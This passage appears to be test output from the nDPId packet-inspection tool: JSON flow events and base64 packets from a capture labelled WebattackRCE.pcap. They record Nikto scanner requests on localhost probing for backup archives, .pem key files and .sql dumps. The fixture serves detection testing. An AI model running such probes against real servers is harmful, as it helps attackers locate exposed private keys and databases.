Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
